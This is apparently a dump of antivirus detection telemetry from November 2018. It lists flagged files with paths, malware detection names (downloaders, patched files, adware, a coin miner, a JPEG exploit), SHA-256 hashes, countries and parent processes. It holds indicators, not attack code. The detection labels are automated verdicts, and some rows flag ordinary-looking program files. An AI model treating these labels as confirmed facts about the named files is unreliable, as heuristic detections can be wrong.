 [Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074924-96f37ad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-074924-96F37AD9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3a5e26416ced265e1d0f270ac3b717e83a707a06efe6655b6b3d89847a8b6610', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igfxpers.exe', filepath='e:\\master\\driver_old\\chipset\\vga\\intel\\win2k_xp\\graphics\\graphics\\igfxpers.exe', filesize=192000, name='W32/Chir.B.#M1.#R1'), hash='564b018e45ee1c4366de1f1df3ae836a62680f207abf1d469a1fefc2f0afe717', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8716972\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\Dados Usuário\\Downloads\\Baixaki_Virtual DJ_3938780979.exe', parentsize=2300160, timestamp='2018-11-02T18:40:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T21:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='18aed9087d883e307f6708bbd5be3c5fbe76e3f25bb222510e84b35e45352b4c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='haitin.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\haitiN\\haitiN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:12:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151020-ba0e1698', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4c1514ac\\AVSCAN-20181102-151005-B7DEC94A\\AVSCAN-20181102-151020-BA0E1698', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190807-8fb01c92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bcbe83b\\AVSCAN-20181102-185817-366C7C7C\\AVSCAN-20181102-190807-8FB01C92', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-16-07-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T09:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:29:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160038-f161ed7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160038-F161ED7D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155458-52a066bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b2c8bc84\\AVSCAN-20181102-155347-45687CB0\\AVSCAN-20181102-155458-52A066BB', filesize=128000, name='HEUR/Macro.Word2000.#M1.#R1'), hash='68e0ce5418ba9591e22ef436bb65eb6ed36e57092bc6211afaf10029c378fb36', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='46c6770373f0aabfe44f8fce4b21bf2b7aa3f6ce8fe61dd8fa1a492600bfac91', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_946c4e8d_78c73cc2.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_946c4e8d_78c73cc2.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T11:48:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printtxt.exe', filepath='\\\\?\\C:\\INFO2000\\PrintTXT.exe', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='2cd99c2e7f240662a1ae61620a8cff41af99feb85b46acf2b20b360c118f7c5d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icons.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\Icons\\Icons.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='6d6264091d3ff472c7ae4ca57fbf3dc56357a49eb003c497f2b9ed2032db0c23', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00006252', filepath='C:\\Windows\\Temp\\d0977cff-6248-4b99-80bd-c3055b8326c1\\tmp00000104\\tmp00006252', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='21025ebff3f4ef190413641b2cfc2d1958e88aee26c9257bdb7b849cd4f83d48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104838-1c981a2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104838-1C981A2E', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194154-4c66b5e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-194154-4C66B5E9', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:41:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181817-a1ce018c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7d6212d\\AVSCAN-20181102-181800-9ED3AD10\\AVSCAN-20181102-181817-A1CE018C', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spinstall.exe', filepath='C:\\Windows\\System32\\spinstall.exe', filesize=448000, name='TR/Patched.Gen.#M300.#R2947'), hash='28bb865ea1e35ae022aacf8a7ed192e757aea0361800719a6a88774250b69886', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T01:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054709-b57f4ee3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054709-B57F4EE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053943-abd14599', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053943-ABD14599', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053213-9f2e2463', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053213-9F2E2463', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24fc8023486790758567a9036c4680529ed598c7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\24fc8023486790758567a9036c4680529ed598c7', filesize=2112000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='5ab06a79bf58ecd6f50e8e9c9e744cb0967802444aea664befa6394d66e9e763', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-232547-8a4eb6cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c448bb16\\AVSCAN-20181101-232455-7FE63B6E\\AVSCAN-20181101-232547-8A4EB6CC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='732a32981540f2e22fb53ee75cc106761595feefddb07e3f41126a834a8d065d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:02Z'), dt=datetime.date(2018, 11, 2)),
